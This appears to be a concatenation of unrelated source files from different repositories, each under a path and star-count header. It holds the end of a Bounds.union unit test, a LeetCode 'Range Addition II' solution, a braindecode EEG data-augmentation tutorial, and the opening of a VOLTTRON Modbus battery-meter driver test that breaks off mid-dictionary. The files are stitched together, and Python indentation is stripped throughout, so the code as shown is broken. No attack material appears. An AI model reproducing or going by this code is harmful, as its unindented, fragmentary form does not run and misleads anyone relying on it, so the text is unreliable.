bounds1 = Bounds(1, 3)
bounds2 = Bounds()
bounds3 = bounds1.union(bounds2)
assert bounds3 is not bounds1
assert bounds3 is not bounds2
assert list(bounds3) == [1, 2]
def test_union_normal_normal(self) -> None:
bounds1 = Bounds(1, 3)
bounds2 = Bounds(3, 5)
bounds3 = bounds1.union(bounds2)
assert bounds3 is not bounds1
assert bounds3 is not bounds2
assert list(bounds3) == [1, 2, 3, 4]
|
questions/range-addition-ii/Solution.py | marcus-aurelianus/leetcode-solutions | 141 | 12746148 | <gh_stars>100-1000
"""
You are given an m x n matrix M initialized with all 0's and an array of operations ops, where ops[i] = [ai, bi] means M[x][y] should be incremented by one for all 0 <= x < ai and 0 <= y < bi.
Count and return the number of maximum integers in the matrix after performing all the operations.
Example 1:
Input: m = 3, n = 3, ops = [[2,2],[3,3]]
Output: 4
Explanation: The maximum integer in M is 2, and there are four of it in M. So return 4.
Example 2:
Input: m = 3, n = 3, ops = [[2,2],[3,3],[3,3],[3,3],[2,2],[3,3],[3,3],[3,3],[2,2],[3,3],[3,3],[3,3]]
Output: 4
Example 3:
Input: m = 3, n = 3, ops = []
Output: 9
Constraints:
1 <= m, n <= 4 * 104
1 <= ops.length <= 104
ops[i].length == 2
1 <= ai <= m
1 <= bi <= n
"""
class Solution(object):
def maxCount(self, m, n, ops):
"""
:type m: int
:type n: int
:type ops: List[List[int]]
:rtype: int
"""
my, mx = m, n
for op in ops:
my = min(my, op[0])
mx = min(mx, op[1])
return my * mx |
examples/plot_data_augmentation.py | braindecode/braindecode | 301 | 12746164 | <gh_stars>100-1000
"""
Data Augmentation on BCIC IV 2a Dataset
=======================================
This tutorial shows how to train EEG deep models with data augmentation. It
follows the trial-wise decoding example and also illustrates the effect of a
transform on the input signals.
.. contents:: This example covers:
:local:
:depth: 2
"""
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
######################################################################
# Loading and preprocessing the dataset
# -------------------------------------
######################################################################
# Loading
# ~~~~~~~
#
from braindecode import EEGClassifier
from skorch.helper import predefined_split
from skorch.callbacks import LRScheduler
from braindecode.datasets import MOABBDataset
subject_id = 3
dataset = MOABBDataset(dataset_name="BNCI2014001", subject_ids=[subject_id])
######################################################################
# Preprocessing
# ~~~~~~~~~~~~~
#
from braindecode.preprocessing import (
exponential_moving_standardize, preprocess, Preprocessor, scale)
low_cut_hz = 4. # low cut frequency for filtering
high_cut_hz = 38. # high cut frequency for filtering
# Parameters for exponential moving standardization
factor_new = 1e-3
init_block_size = 1000
preprocessors = [
Preprocessor('pick_types', eeg=True, meg=False, stim=False), # Keep EEG sensors
Preprocessor(scale, factor=1e6, apply_on_array=True), # Convert from V to uV
Preprocessor('filter', l_freq=low_cut_hz, h_freq=high_cut_hz), # Bandpass filter
Preprocessor(exponential_moving_standardize, # Exponential moving standardization
factor_new=factor_new, init_block_size=init_block_size)
]
preprocess(dataset, preprocessors)
######################################################################
# Extracting windows
# ~~~~~~~~~~~~~~~~~~
#
from braindecode.preprocessing import create_windows_from_events
trial_start_offset_seconds = -0.5
# Extract sampling frequency, check that they are same in all datasets
sfreq = dataset.datasets[0].raw.info['sfreq']
assert all([ds.raw.info['sfreq'] == sfreq for ds in dataset.datasets])
# Calculate the trial start offset in samples.
trial_start_offset_samples = int(trial_start_offset_seconds * sfreq)
# Create windows using braindecode function for this. It needs parameters to
# define how trials should be used.
windows_dataset = create_windows_from_events(
dataset,
trial_start_offset_samples=trial_start_offset_samples,
trial_stop_offset_samples=0,
preload=True,
)
######################################################################
# Split dataset into train and valid
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
splitted = windows_dataset.split('session')
train_set = splitted['session_T']
valid_set = splitted['session_E']
######################################################################
# Defining a Transform
# --------------------
#
######################################################################
# Data can be manipulated by transforms, which are callable objects. A
# transform is usually handled by a custom data loader, but can also be called
# directly on input data, as demonstrated below for illutrative purposes.
#
# First, we need to define a Transform. Here we chose the FrequencyShift, which
# randomly translates all frequencies within a given range.
from braindecode.augmentation import FrequencyShift
transform = FrequencyShift(
probability=1., # defines the probability of actually modifying the input
sfreq=sfreq,
max_delta_freq=2. # the frequency shifts are sampled now between -2 and 2 Hz
)
######################################################################
# Manipulating one session and visualizing the transformed data
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Next, let us augment one session to show the resulting frequency shift. The
# data of an mne Epoch is used here to make usage of mne functions.
import torch
epochs = train_set.datasets[0].windows # original epochs
X = epochs.get_data()
# This allows to apply the transform with a fixed shift (10 Hz) for
# visualization instead of sampling the shift randomly between -2 and 2 Hz
X_tr, _ = transform.operation(torch.as_tensor(X).float(), None, 10., sfreq)
######################################################################
# The psd of the transformed session has now been shifted by 10 Hz, as one can
# see on the psd plot.
import mne
import matplotlib.pyplot as plt
import numpy as np
def plot_psd(data, axis, label, color):
psds, freqs = mne.time_frequency.psd_array_multitaper(data, sfreq=sfreq,
fmin=0.1, fmax=100)
psds = 10. * np.log10(psds)
psds_mean = psds.mean(0).mean(0)
axis.plot(freqs, psds_mean, color=color, label=label)
_, ax = plt.subplots()
plot_psd(X, ax, 'original', 'k')
plot_psd(X_tr.numpy(), ax, 'shifted', 'r')
ax.set(title='Multitaper PSD (gradiometers)', xlabel='Frequency (Hz)',
ylabel='Power Spectral Density (dB)')
ax.legend()
plt.show()
######################################################################
# Training a model with data augmentation
# ---------------------------------------
#
# Now that we know how to instantiate ``Transforms``, it is time to learn how
# to use them to train a model and try to improve its generalization power.
# Let's first create a model.
#
# Create model
# ~~~~~~~~~~~~
#
######################################################################
# The model to be trained is defined as usual.
from braindecode.util import set_random_seeds
from braindecode.models import ShallowFBCSPNet
cuda = torch.cuda.is_available() # check if GPU is available, if True chooses to use it
device = 'cuda' if cuda else 'cpu'
if cuda:
torch.backends.cudnn.benchmark = True
# Set random seed to be able to reproduce results
seed = 20200220
set_random_seeds(seed=seed, cuda=cuda)
n_classes = 4
# Extract number of chans and time steps from dataset
n_channels = train_set[0][0].shape[0]
input_window_samples = train_set[0][0].shape[1]
model = ShallowFBCSPNet(
n_channels,
n_classes,
input_window_samples=input_window_samples,
final_conv_length='auto',
)
######################################################################
# Create an EEGClassifier with the desired augmentation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
######################################################################
# In order to train with data augmentation, a custom data loader can be
# for the training. Multiple transforms can be passed to it and will be applied
# sequentially to the batched data within the ``AugmentedDataLoader`` object.
from braindecode.augmentation import AugmentedDataLoader, SignFlip
freq_shift = FrequencyShift(
probability=.5,
sfreq=sfreq,
max_delta_freq=2. # the frequency shifts are sampled now between -2 and 2 Hz
)
sign_flip = SignFlip(probability=.1)
transforms = [
freq_shift,
sign_flip
]
# Send model to GPU
if cuda:
model.cuda()
######################################################################
# The model is now trained as in the trial-wise example. The
# ``AugmentedDataLoader`` is used as the train iterator and the list of
# transforms are passed as arguments.
lr = 0.0625 * 0.01
weight_decay = 0
batch_size = 64
n_epochs = 4
clf = EEGClassifier(
model,
iterator_train=AugmentedDataLoader, # This tells EEGClassifier to use a custom DataLoader
iterator_train__transforms=transforms, # This sets the augmentations to use
criterion=torch.nn.NLLLoss,
optimizer=torch.optim.AdamW,
train_split=predefined_split(valid_set), # using valid_set for validation
optimizer__lr=lr,
optimizer__weight_decay=weight_decay,
batch_size=batch_size,
callbacks=[
"accuracy",
("lr_scheduler", LRScheduler('CosineAnnealingLR', T_max=n_epochs - 1)),
],
device=device,
)
# Model training for a specified number of epochs. `y` is None as it is already
# supplied in the dataset.
clf.fit(train_set, y=None, epochs=n_epochs)
######################################################################
# Manually composing Transforms
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# It would be equivalent (although more verbose) to pass to ``EEGClassifier`` a
# composition of the same transforms:
from braindecode.augmentation import Compose
composed_transforms = Compose(transforms=transforms)
######################################################################
# Setting the data augmentation at the Dataset level
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Also note that it is also possible for most of the transforms to pass them
# directly to the WindowsDataset object through the `transform` argument, as
# most commonly done in other libraries. However, it is advised to use the
# ``AugmentedDataLoader`` as above, as it is compatible with all transforms and
# can be more efficient.
train_set.transform = composed_transforms
|
services/core/PlatformDriverAgent/platform_driver/interfaces/modbus_tk/tests/test_battery_meter.py | cloudcomputingabc/volttron | 406 | 12746196 | import pytest
import gevent
import logging
import time
from volttron.platform import get_services_core, jsonapi
from volttrontesting.utils.utils import get_rand_ip_and_port
from platform_driver.interfaces.modbus_tk.server import Server
from platform_driver.interfaces.modbus_tk.maps import Map, Catalog
from volttron.platform.agent.known_identities import PLATFORM_DRIVER
logger = logging.getLogger(__name__)
IP, _port = get_rand_ip_and_port().split(":")
PORT = int(_port)
# New modbus_tk driver config
DRIVER_CONFIG = {
"driver_config": {
"name": "test",
"device_address": IP,
"port": PORT,
"slave_id": 1,
"addressing": "offset",
"register_map": "config://modbus_tk_map.csv"
},
"driver_type": "modbus_tk",
"registry_config": "config://modbus_tk.csv",
"interval": 60,
"timezone": "UTC"
}
# New modbus_tk csv config
REGISTRY_CONFIG_STRING = """Volttron Point Name,Register Name
BRAND (),BRAND ()
MODEL (),MODEL ()
COMS STATUS (),COMS STATUS ()
COMS QUALITY (),COMS QUALITY ()
NUMBER OF QUERIES (),NUMBER OF QUERIES ()
NUMBER OF FAILS (),NUMBER OF FAILS ()
DATE LAST ACQUISITION (),DATE LAST ACQUISITION ()
LAST SAMPLING DURATION (s),LAST SAMPLING DURATION (s)
ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh),ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh)
REAL ENERGY QUADRANTS 1-4 IMPORT (kWh),REAL ENERGY QUADRANTS 1-4 IMPORT (kWh)
REAL ENERGY QUADRANTS 2-3 EXPORT (kWh),REAL ENERGY QUADRANTS 2-3 EXPORT (kWh)
REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh),REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh)
REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh),REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh)
REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh),REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh)
REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh),REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh)
APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh),APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh)
APPARENT QUADRANTS 1-4 IMPORT (kVAh),APPARENT QUADRANTS 1-4 IMPORT (kVAh)
APPARENT QUADRANTS 2-3 EXPORT (kVAh),APPARENT QUADRANTS 2-3 EXPORT (kVAh)
TOTAL INSTANTANEOUS REAL POWER (kW),TOTAL INSTANTANEOUS REAL POWER (kW)
TOTAL INSTANTANEOUS REACTIVE POWER (kVAR),TOTAL INSTANTANEOUS REACTIVE POWER (kVAR)
TOTAL INSTANTANEOUS APPARENT POWER (kVA),TOTAL INSTANTANEOUS APPARENT POWER (kVA)
TOTAL POWER FACTOR (-),TOTAL POWER FACTOR (-)
AVERAGE VOLTAGE L-L (V),AVERAGE VOLTAGE L-L (V)
AVERAGE VOLTAGE L-N (V),AVERAGE VOLTAGE L-N (V)
AVERAGE CURRENT (A),AVERAGE CURRENT (A)
FREQUENCY (Hz),FREQUENCY (Hz)
TOTAL REAL POWER PRESENT DEMAND (kW),TOTAL REAL POWER PRESENT DEMAND (kW)
TOTAL REACTIVE POWER PRESENT DEMAND (kVAR),TOTAL REACTIVE POWER PRESENT DEMAND (kVAR)
TOTAL APPARENT POWER PRESENT DEMAND (kVA),TOTAL APPARENT POWER PRESENT DEMAND (kVA)
TOTAL REAL POWER MAX. DEMAND IMPORT (kW),TOTAL REAL POWER MAX. DEMAND IMPORT (kW)
TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR),TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR)
TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA),TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA)
TOTAL REAL POWER MAX. DEMAND EXPORT (kW),TOTAL REAL POWER MAX. DEMAND EXPORT (kW)
TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR),TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR)
TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA),TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA)
PULSE COUNTER 1 (-),PULSE COUNTER 1 (-)
PULSE COUNTER 2 (-),PULSE COUNTER 2 (-)
ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh)
ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh)
ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh)
ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh)
ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh)
ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh)
ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh)
ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh)
ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh)
ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh)
ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh)
ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh)
ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh)
ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh)
ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh)
ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh)
ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh)
ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh)
ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh)
REAL POWER PHASE A (kW),REAL POWER PHASE A (kW)
REAL POWER PHASE B (kW),REAL POWER PHASE B (kW)
REAL POWER PHASE C (kW),REAL POWER PHASE C (kW)
REACTIVE POWER PHASE A (kVAR),REACTIVE POWER PHASE A (kVAR)
REACTIVE POWER PHASE B (kVAR),REACTIVE POWER PHASE B (kVAR)
REACTIVE POWER PHASE C (kVAR),REACTIVE POWER PHASE C (kVAR)
APPARENT POWER PHASE A (kVA),APPARENT POWER PHASE A (kVA)
APPARENT POWER PHASE B (kVA),APPARENT POWER PHASE B (kVA)
APPARENT POWER PHASE C (kVA),APPARENT POWER PHASE C (kVA)
POWER FACTOR PHASE A (-),POWER FACTOR PHASE A (-)
POWER FACTOR PHASE B (-),POWER FACTOR PHASE B (-)
POWER FACTOR PHASE C (-),POWER FACTOR PHASE C (-)
VOLTAGE PHASE A-B (V),VOLTAGE PHASE A-B (V)
VOLTAGE PHASE B-C (V),VOLTAGE PHASE B-C (V)
VOLTAGE PHASE A-C (V),VOLTAGE PHASE A-C (V)
VOLTAGE PHASE A-N (V),VOLTAGE PHASE A-N (V)
VOLTAGE PHASE B-N (V),VOLTAGE PHASE B-N (V)
VOLTAGE PHASE C-N (V),VOLTAGE PHASE C-N (V)
CURRENT PHASE A (A),CURRENT PHASE A (A)
CURRENT PHASE B (A),CURRENT PHASE B (A)
CURRENT PHASE C (A),CURRENT PHASE C (A)"""
REGISTER_MAP = """Register Name,Address,Type,Units,Writable,Transform,Table,Mixed Endian
ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh),399,float,kWh,TRUE,,analog_output_holding_registers,TRUE
REAL ENERGY QUADRANTS 1-4 IMPORT (kWh),401,float,kWh,TRUE,,analog_output_holding_registers,TRUE
REAL ENERGY QUADRANTS 2-3 EXPORT (kWh),403,float,kWh,TRUE,,analog_output_holding_registers,TRUE
REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh),405,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh),407,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh),409,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh),411,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh),413,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
APPARENT QUADRANTS 1-4 IMPORT (kVAh),415,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
APPARENT QUADRANTS 2-3 EXPORT (kVAh),417,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
TOTAL INSTANTANEOUS REAL POWER (kW),419,float,kW,TRUE,,analog_output_holding_registers,TRUE
TOTAL INSTANTANEOUS REACTIVE POWER (kVAR),421,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
TOTAL INSTANTANEOUS APPARENT POWER (kVA),423,float,kVA,TRUE,,analog_output_holding_registers,TRUE
TOTAL POWER FACTOR (-),425,float,,TRUE,,analog_output_holding_registers,TRUE
AVERAGE VOLTAGE L-L (V),427,float,V,TRUE,,analog_output_holding_registers,TRUE
AVERAGE VOLTAGE L-N (V),429,float,V,TRUE,,analog_output_holding_registers,TRUE
AVERAGE CURRENT (A),431,float,A,TRUE,,analog_output_holding_registers,TRUE
FREQUENCY (Hz),433,float,Hz,TRUE,,analog_output_holding_registers,TRUE
TOTAL REAL POWER PRESENT DEMAND (kW),435,float,kW,TRUE,,analog_output_holding_registers,TRUE
TOTAL REACTIVE POWER PRESENT DEMAND (kVAR),437,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
TOTAL APPARENT POWER PRESENT DEMAND (kVA),439,float,kVA,TRUE,,analog_output_holding_registers,TRUE
TOTAL REAL POWER MAX. DEMAND IMPORT (kW),441,float,kW,TRUE,,analog_output_holding_registers,TRUE
TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR),443,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA),445,float,kVA,TRUE,,analog_output_holding_registers,TRUE
TOTAL REAL POWER MAX. DEMAND EXPORT (kW),447,float,kW,TRUE,,analog_output_holding_registers,TRUE
TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR),449,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA),451,float,kVA,TRUE,,analog_output_holding_registers,TRUE
PULSE COUNTER 1 (-),453,float,,TRUE,,analog_output_holding_registers,TRUE
PULSE COUNTER 2 (-),455,float,,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh),457,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh),459,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh),461,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh),463,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh),465,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh),467,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh),469,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh),471,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh),473,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh),475,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh),477,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh),479,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh),481,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh),483,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh),485,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh),487,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh),489,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh),491,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh),493,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh),495,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh),497,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh),499,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh),501,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh),503,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
REAL POWER PHASE A (kW),505,float,kW,TRUE,,analog_output_holding_registers,TRUE
REAL POWER PHASE B (kW),507,float,kW,TRUE,,analog_output_holding_registers,TRUE
REAL POWER PHASE C (kW),509,float,kW,TRUE,,analog_output_holding_registers,TRUE
REACTIVE POWER PHASE A (kVAR),511,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
REACTIVE POWER PHASE B (kVAR),513,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
REACTIVE POWER PHASE C (kVAR),515,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
APPARENT POWER PHASE A (kVA),517,float,kVA,TRUE,,analog_output_holding_registers,TRUE
APPARENT POWER PHASE B (kVA),519,float,kVA,TRUE,,analog_output_holding_registers,TRUE
APPARENT POWER PHASE C (kVA),521,float,kVA,TRUE,,analog_output_holding_registers,TRUE
POWER FACTOR PHASE A (-),523,float,,TRUE,,analog_output_holding_registers,TRUE
POWER FACTOR PHASE B (-),525,float,,TRUE,,analog_output_holding_registers,TRUE
POWER FACTOR PHASE C (-),527,float,,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE A-B (V),529,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE B-C (V),531,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE A-C (V),533,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE A-N (V),535,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE B-N (V),537,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE C-N (V),539,float,V,TRUE,,analog_output_holding_registers,TRUE
CURRENT PHASE A (A),541,float,A,TRUE,,analog_output_holding_registers,TRUE
CURRENT PHASE B (A),543,float,A,TRUE,,analog_output_holding_registers,TRUE
CURRENT PHASE C (A),545,float,A,TRUE,,analog_output_holding_registers,TRUE"""
# Register values dictionary for testing set_point and get_point
registers_dict = {"ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh)": 74.0,
"REAL ENERGY QUADRANTS 1-4 IMPORT (kWh)": 73.0,
"REAL ENERGY QUADRANTS 2-3 EXPORT (kWh)": 72.0,
"REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh)": 71.0,
"REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh)": 70.0,
"REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh)": 69.0,
"REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh)": 68.0,
"APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh)": 67.0,
"APPARENT QUADRANTS 1-4 IMPORT (kVAh)": 66.0,
"APPARENT QUADRANTS 2-3 EXPORT (kVAh)": 65.0,
"TOTAL INSTANTANEOUS REAL POWER (kW)": 64.0,
"TOTAL INSTANTANEOUS REACTIVE POWER (kVAR)": 63.0,
"TOTAL INSTANTANEOUS APPARENT POWER (kVA)": 62.0,
"TOTAL POWER FACTOR (-)": 61.0,
"AVERAGE VOLTAGE L-L (V)": 60.0,
"AVERAGE VOLTAGE L-N (V)": 59.0,
"AVERAGE CURRENT (A)": 58.0,
"FREQUENCY (Hz)": 57.0,
"TOTAL REAL POWER PRESENT DEMAND (kW)": 56.0,
"TOTAL REACTIVE POWER PRESENT DEMAND (kVAR)": 55.0,
"TOTAL APPARENT POWER PRESENT DEMAND (kVA)": 54.0,
"TOTAL REAL POWER MAX. DEMAND IMPORT (kW)": 53.0,
"TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR)": 52.0,
"TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA)": 51.0,
"TOTAL REAL POWER MAX. DEMAND EXPORT (kW)": 50.0,
"TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR)": 49.0,
"TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA)": 48.0,
"PULSE COUNTER 1 (-)": 47.0,
"PULSE COUNTER 2 (-)": 46.0,
"ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh)": 45.0,
"ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh)": 44.0,
"ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh)": 43.0,
"ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh)": 42.0,
"ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh)": 41.0,
"ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh)": 40.0,
"ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh)": 39.0,
"ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh)": 38.0,
"ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh)": 37.0,
"ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh)": 36.0,
"ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh)": 35.0,
"ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh)": 34.0,
"ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh)": 33.0,
"ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh)": 32.0,
"ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh)": 31.0,
"ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh)": 30.0,
"ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh)": 29.0,
"ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh)": 28.0,
